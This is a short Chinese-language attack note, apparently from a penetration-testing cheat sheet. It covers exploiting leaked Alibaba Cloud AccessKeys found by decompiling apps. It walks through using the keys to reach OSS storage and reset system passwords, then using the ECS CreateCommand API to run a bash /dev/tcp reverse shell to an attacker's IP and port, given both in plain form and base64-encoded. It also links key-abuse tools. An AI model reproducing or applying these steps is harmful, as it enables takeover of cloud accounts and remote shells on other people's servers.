Osskey
反编译app文件,查找可能会包含oss key的文件,如JS。
OSSAccessKey、AccessKeySecret使用OSS浏览器访问。
第三方行云管家可修改系统密码。
反弹shell
From: https://xz.aliyun.com/t/8310
https://api.aliyun.com/#/?product=Ecs
搜索框搜索选择CreateCommand来创建一个命令
CommandContent填命令的base64,Type填RunShellScript
命令echo "bash -i >& /dev/tcp/你的IP/端口 0>&1"| base64
bash -i >& /dev/tcp/你的IP/端口 0>&1
YmFzaCAtaSAmZ3Q7JiAvZGV2L3RjcC8xLjEuMS4xLzQ0NDQgMCZndDsmMQ==
填好以后点调试SDK
会直接给你起一个Cloud shell
data:image/s3,"s3://crabby-images/b90d3/b90d30738e34a0acef78a7ebd23c15ac50a5f5a7" alt="image"
并创建一个CreateCommand.py文件,使用vi编辑
data:image/s3,"s3://crabby-images/a8e03/a8e03bc620e25779fa74cd22874a73fd87c6a8b7" alt="image"
填accessKeyId,accessSecret保存执行,并记录Commandid
data:image/s3,"s3://crabby-images/6ed03/6ed037ba32ee4603b8d996894ef6dbd4295abdfd" alt="image"
data:image/s3,"s3://crabby-images/d6951/d6951c65a26b3b4a25a46e550339f8ac9c55c684" alt="image"
Commandid填上面请求的返回值,InstanceId填行云管家显示的实例ID
data:image/s3,"s3://crabby-images/41ef4/41ef427245cb9b015aeedcd94f19d7b0cfe9bf53" alt="image"
填好了点调试sdk然后编辑文件把accessKeyId accessSecret填一下,执行
data:image/s3,"s3://crabby-images/5b2be/5b2bef1c334a87e7dece4a8953102625514ebe90" alt="image"
data:image/s3,"s3://crabby-images/aa5db/aa5db6a5f65aff0b568967cff2bb37b20bb4db23" alt="image"
工具
https://github.com/iiiusky/alicloud-tools
https://github.com/mrknow001/aliyun-accesskey-Tools